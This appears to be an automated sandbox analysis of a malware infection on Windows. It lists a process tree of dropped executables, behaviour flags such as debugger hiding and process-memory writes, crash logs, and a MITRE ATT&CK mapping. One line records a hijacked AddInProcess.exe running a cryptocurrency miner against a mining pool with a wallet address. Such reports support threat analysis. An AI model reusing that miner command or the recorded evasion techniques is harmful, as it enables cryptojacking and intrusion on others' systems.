        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:20140
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:24176
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:23684
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:23924
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:23692
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:17616
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:12420
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:24404
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:24680
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:22312
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:14432
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:25224
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:23168
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:9792
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:4668
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:18020
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:24700
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:25624
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:26400
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:25996
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:17536
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:3416
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:26864
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:27460
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:26284
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:27580
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:26768
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:22284
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:19408
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:23716
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:11520
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:8796
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:24212
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:5436
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:17732
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:21892
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:3484
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:5968
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:22248
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:23580
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:22112
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:2288
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:27140
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:25664
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:24432
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:14060
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:25944
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:18652
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:11104
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:22368
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:21488
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:2780
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:26704
    - - C:\Users\Admin\Documents\_DZTHL2I9hYYhHVgbL_Sy2Ss.exe
        
        "C:\Users\Admin\Documents\_DZTHL2I9hYYhHVgbL_Sy2Ss.exe"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5548
    - - C:\Users\Admin\Documents\TtArTDLsM_MA5QGorM8pLO_d.exe
        
        "C:\Users\Admin\Documents\TtArTDLsM_MA5QGorM8pLO_d.exe"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5540
    - - C:\Users\Admin\Documents\eDCiJRR_EN4bTnA806_hQfSk.exe
        
        "C:\Users\Admin\Documents\eDCiJRR_EN4bTnA806_hQfSk.exe"
        5⤵
        Executes dropped EXE
        
        PID:5532
      - C:\ProgramData\8902401.exe
        
        "C:\ProgramData\8902401.exe"
        6⤵
        Suspicious behavior: SetClipboardViewer
        
        PID:400
      - C:\ProgramData\7660459.exe
        
        "C:\ProgramData\7660459.exe"
        6⤵
        
        PID:1296
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1296 -s 2296
        7⤵
        Program crash
        
        PID:7716
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1296 -s 2296
        7⤵
        Program crash
        
        PID:2400
      - C:\ProgramData\8078852.exe
        
        "C:\ProgramData\8078852.exe"
        6⤵
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5480
      - C:\ProgramData\6312321.exe
        
        "C:\ProgramData\6312321.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5436
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 2488
        7⤵
        Program crash
        
        PID:8028

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv hT4RkUrQU0KJr6hWfqbv1w.0.2
1⤵
- Modifies data under HKEY_USERS
PID:3876

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:572
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:664
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 460
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 664 -ip 664
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4848 -ip 4848
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 3184 -ip 3184
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4472

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 444 -p 3956 -ip 3956
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1652 -ip 1652
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1400 -ip 1400
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2580

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 356 -p 3296 -ip 3296
1⤵
PID:2960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5404 -ip 5404
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4948 -ip 4948
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5444 -ip 5444
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5436 -ip 5436
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 5428 -ip 5428
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4916

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:4696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 3336 -ip 3336
1⤵
PID:1252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5396 -ip 5396
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1196 -ip 1196
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3912

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:3300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 5460 -ip 5460
1⤵
PID:5136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5128 -ip 5128
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2232 -ip 2232
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5064 -ip 5064
1⤵
PID:5360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1916 -ip 1916
1⤵
PID:1660

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 1296 -ip 1296
1⤵
PID:4600

C:\Users\Admin\AppData\Local\Temp\E44.exe
C:\Users\Admin\AppData\Local\Temp\E44.exe
1⤵
PID:6752
- C:\Users\Admin\AppData\Local\Temp\E44.exe
  C:\Users\Admin\AppData\Local\Temp\E44.exe
  2⤵
  PID:2844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5436 -ip 5436
1⤵
PID:3988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 7844 -ip 7844
1⤵
PID:7644

C:\Users\Admin\AppData\Local\Temp\8AC8.exe
C:\Users\Admin\AppData\Local\Temp\8AC8.exe
1⤵
PID:6928

C:\Users\Admin\AppData\Local\Temp\C292.exe
C:\Users\Admin\AppData\Local\Temp\C292.exe
1⤵
PID:7224

C:\Users\Admin\AppData\Local\Temp\411.exe
C:\Users\Admin\AppData\Local\Temp\411.exe
1⤵
PID:132
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 132 -s 284
  2⤵
  - Program crash
  PID:236

C:\Users\Admin\AppData\Local\Temp\1D86.exe
C:\Users\Admin\AppData\Local\Temp\1D86.exe
1⤵
PID:7836
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7836 -s 276
  2⤵
  - Program crash
  PID:3244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 132 -ip 132
1⤵
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7836 -ip 7836
1⤵
PID:3580

C:\Users\Admin\AppData\Local\Temp\59F3.exe
C:\Users\Admin\AppData\Local\Temp\59F3.exe
1⤵
PID:7984

C:\Users\Admin\AppData\Local\Temp\8E91.exe
C:\Users\Admin\AppData\Local\Temp\8E91.exe
1⤵
PID:8000

C:\Users\Admin\AppData\Local\Temp\9D96.exe
C:\Users\Admin\AppData\Local\Temp\9D96.exe
1⤵
PID:4328
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\SysWOW64\explorer.exe"
  2⤵
  PID:8764
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\SysWOW64\explorer.exe"
  2⤵
  PID:9004
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\SysWOW64\explorer.exe"
  2⤵
  PID:8388
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\SysWOW64\explorer.exe"
  2⤵
  PID:3580
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\SysWOW64\explorer.exe"
  2⤵
  PID:8472

C:\Users\Admin\AppData\Local\Temp\A46D.exe
C:\Users\Admin\AppData\Local\Temp\A46D.exe
1⤵
PID:2944
- C:\Users\Admin\AppData\Local\Temp\A46D.exe
  "C:\Users\Admin\AppData\Local\Temp\A46D.exe"
  2⤵
  PID:9172
- C:\Users\Admin\AppData\Local\Temp\A46D.exe
  "C:\Users\Admin\AppData\Local\Temp\A46D.exe"
  2⤵
  PID:3644

C:\Users\Admin\AppData\Local\Temp\E520.exe
C:\Users\Admin\AppData\Local\Temp\E520.exe
1⤵
PID:7096

C:\Users\Admin\AppData\Local\Temp\F955.exe
C:\Users\Admin\AppData\Local\Temp\F955.exe
1⤵
PID:8708

C:\Users\Admin\AppData\Local\Temp\954.exe
C:\Users\Admin\AppData\Local\Temp\954.exe
1⤵
PID:8416
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection
  2⤵
  PID:8456
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection
  2⤵
  PID:8296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection
  2⤵
  PID:4328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection
  2⤵
  PID:7948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection
  2⤵
  PID:10004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection
  2⤵
  PID:4560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection
  2⤵
  PID:10228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection
  2⤵
  PID:10920
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection
  2⤵
  PID:10852
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1252
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection
  2⤵
  PID:11412
- C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
  C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
  2⤵
  PID:10724
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 a rx -k -u RVN:RPCdeFChJgUgYnWth75SWMLAL2ZmFs8JUU.miner -p x
    3⤵
    PID:25044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 8960 -ip 8960
1⤵
PID:4484

C:\Users\Admin\AppData\Local\Temp\3AE5.exe
C:\Users\Admin\AppData\Local\Temp\3AE5.exe
1⤵
PID:8448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 8420 -ip 8420
1⤵
PID:6468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 8984 -ip 8984
1⤵
PID:8556

C:\Users\Admin\AppData\Local\Temp\971F.exe
C:\Users\Admin\AppData\Local\Temp\971F.exe
1⤵
PID:6160
- C:\Users\Admin\AppData\Local\Temp\971F.exe
  "C:\Users\Admin\AppData\Local\Temp\971F.exe"
  2⤵
  PID:11576
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 11576 -s 1308
    3⤵
    - Program crash
    PID:13492
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 11576 -s 1308
    3⤵
    - Program crash
    PID:12556
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6160 -s 1268
  2⤵
  - Program crash
  PID:9448
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6160 -s 1268
  2⤵
  - Program crash
  PID:11520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:10596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 4484 -ip 4484
1⤵
PID:11528

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 10660 -ip 10660
1⤵
PID:1176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 6160 -ip 6160
1⤵
PID:13100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 11576 -ip 11576
1⤵
PID:13012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:13412

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:13480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 6404 -ip 6404
1⤵
PID:15212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 17068 -ip 17068
1⤵
PID:8532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 15364 -ip 15364
1⤵
PID:18928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 19916 -ip 19916
1⤵
PID:15716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:18924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 10648 -ip 10648
1⤵
PID:18200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 15076 -ip 15076
1⤵
PID:20680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 9784 -ip 9784
1⤵
PID:18084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 23404 -ip 23404
1⤵
PID:14052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 25528 -ip 25528
1⤵
PID:26072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4032 -ip 4032
1⤵
PID:1340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 8316 -ip 8316
1⤵
PID:8520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 13132 -ip 13132
1⤵
PID:440

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery